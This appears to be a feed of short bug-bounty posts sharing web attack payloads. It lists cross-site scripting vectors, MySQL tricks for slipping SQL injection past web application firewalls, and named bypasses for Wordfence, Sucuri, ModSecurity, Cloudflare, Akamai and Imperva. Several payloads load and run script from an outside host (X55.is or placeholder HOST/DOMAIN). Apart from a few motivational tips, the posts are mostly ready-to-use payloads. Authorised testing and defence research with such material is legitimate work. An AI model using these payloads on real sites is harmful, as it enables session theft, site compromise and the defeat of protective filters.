  • Brute One - AI Assistant for Bug Hunting
  • Here's a small #XSS list for manual testing (main cases, high success rate).
    "><img src onerror=alert(1)>
    "autofocus onfocus=alert(1)//
    </script><script>alert(1)</script>
    '-alert(1)-'
    \'-alert(1)//
    javascript:alert(1)
    Try it on:
    - URL query, fragment & path;
    - all input fields.
  • Infosec landscape changing.
  • Some MySQL tricks to break some #WAFs out there.
    SELECT-1e1FROM`test`
    SELECT~1.FROM`test`
    SELECT\NFROM`test`
    SELECT@^1.FROM`test`
    SELECT-id-1.FROM`test`
    #SQLi #bypass #bugbountytip
  • The best single #XSS vector you'll ever have! 😎 JavaScript://%250Aalert?.(1)// '/*\'/*"/*\"/*`/*\`/*%26apos;)/*<!--> </Title/</Style/</Script/</textArea/</iFrame/</noScript> \74k<K/contentEditable/autoFocus/OnFocus= /*${/*/;{/**/(alert)(1)}//><Base/Href=//X55.is\76-->
  • Tips to Master Something
    1. Expose yourself to basics over and over again.
    2. Stick to what you can understand, prove and explain.
    3. Always think in new ways to do the same thing better.
  • Another brutal secret revealed! 😎 Payload to bypass simple email validation in PHP "><svg/onload=confirm(1)>"@x.y #KNOXSS case #21 check it here: brutelogic.com.br/knoxss.html
  • All script-based #XSS vectors. (HTML, no events)
    <script>alert(1)//
    <script>alert(1)<!--
    <script>alert(1)%0A-->
    <script src=data:,alert(1)>
    <script src=//HOST/FILE>
    <script src=https:DOMAIN/FILE>
    <svg><script xlink:href=//HOST/FILE>
    <svg><script xlink:href=https:DOMAIN/FILE>
  • Christmas Gifts!🎄 WAF #XSS Bypasses
    Wordfence 7.4.2
    <a href=&#01javascript:alert(1)>
    Sucuri CloudProxy (POST only)
    <a href=javascript&colon;confirm(1)>
    ModSecurity CRS 3.2.0 PL1
    <a href="jav%0Dascript&colon;alert(1)">
    Encode special chars properly. #MerryChristmas!
  • 7 Steps to Become a #Hacker
    1. Learn
    2. Try
    3. Learn again
    4. Try again
    5. Try UNTIL
    6. Share
    7. Return to 1
    #h4ppyn3wy34r
  • One #XSS Payload to Rule Them All #Bypass Akamai, Imperva and CloudFlare #WAF <A HRef=//X55.is AutoFocus %26%2362 OnFocus%0C=import(href)> #hack2learn @KN0X55
  • CloudFlare #WAF #XSS #Bypass <Svg Only=1 OnLoad=confirm(1)>
  • #XSS PoC Styles
    Noob: alert(1)
    Bug Hunter: alert(document.domain)
    WAF Bypasser: d=document,b='`',d['loca'+'tion']='javascript&colon;aler'+'t'+b+domain+b
    Red Teamer: import('//X55.is/wp')